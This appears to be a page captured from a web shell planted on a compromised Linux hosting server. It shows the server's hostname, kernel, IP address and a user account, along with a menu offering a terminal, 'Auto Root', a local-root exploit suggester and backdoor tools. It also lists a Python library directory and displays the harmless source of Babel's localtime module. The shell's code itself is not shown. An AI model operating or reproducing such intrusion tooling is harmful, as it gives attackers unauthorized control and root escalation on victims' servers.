Linux ams-business-8.hostwindsdns.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
LiteSpeed
Server IP : 192.236.177.161 & Your IP : 216.73.216.50
Domains :
Cant Read [ /etc/named.conf ]
User : ajzdfbpz
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python2.7 /
site-packages /
babel /
localtime /
Delete
Unzip
Name
Size
Permission
Date
Action
__init__.py
1.68
KB
-rw-r--r--
2016-11-19 14:05
__init__.pyc
2.65
KB
-rw-r--r--
2022-04-21 13:24
__init__.pyo
2.65
KB
-rw-r--r--
2022-04-21 13:24
_unix.py
5.02
KB
-rw-r--r--
2017-08-18 10:03
_unix.pyc
3.55
KB
-rw-r--r--
2022-04-21 13:24
_unix.pyo
3.55
KB
-rw-r--r--
2022-04-21 13:24
_win32.py
3
KB
-rw-r--r--
2016-11-19 14:05
_win32.pyc
2.3
KB
-rw-r--r--
2022-04-21 13:24
_win32.pyo
2.3
KB
-rw-r--r--
2022-04-21 13:24
Save
Rename
# -*- coding: utf-8 -*- """ babel.localtime ~~~~~~~~~~~~~~~ Babel specific fork of tzlocal to determine the local timezone of the system. :copyright: (c) 2013 by the Babel Team. :license: BSD, see LICENSE for more details. """ import sys import pytz import time from datetime import timedelta from datetime import tzinfo from threading import RLock if sys.platform == 'win32': from babel.localtime._win32 import _get_localzone else: from babel.localtime._unix import _get_localzone _cached_tz = None _cache_lock = RLock() STDOFFSET = timedelta(seconds=-time.timezone) if time.daylight: DSTOFFSET = timedelta(seconds=-time.altzone) else: DSTOFFSET = STDOFFSET DSTDIFF = DSTOFFSET - STDOFFSET ZERO = timedelta(0) class _FallbackLocalTimezone(tzinfo): def utcoffset(self, dt): if self._isdst(dt): return DSTOFFSET else: return STDOFFSET def dst(self, dt): if self._isdst(dt): return DSTDIFF else: return ZERO def tzname(self, dt): return time.tzname[self._isdst(dt)] def _isdst(self, dt): tt = (dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, dt.weekday(), 0, -1) stamp = time.mktime(tt) tt = time.localtime(stamp) return tt.tm_isdst > 0 def get_localzone(): """Returns the current underlying local timezone object. Generally this function does not need to be used, it's a better idea to use the :data:`LOCALTZ` singleton instead. """ return _get_localzone() try: LOCALTZ = get_localzone() except pytz.UnknownTimeZoneError: LOCALTZ = _FallbackLocalTimezone()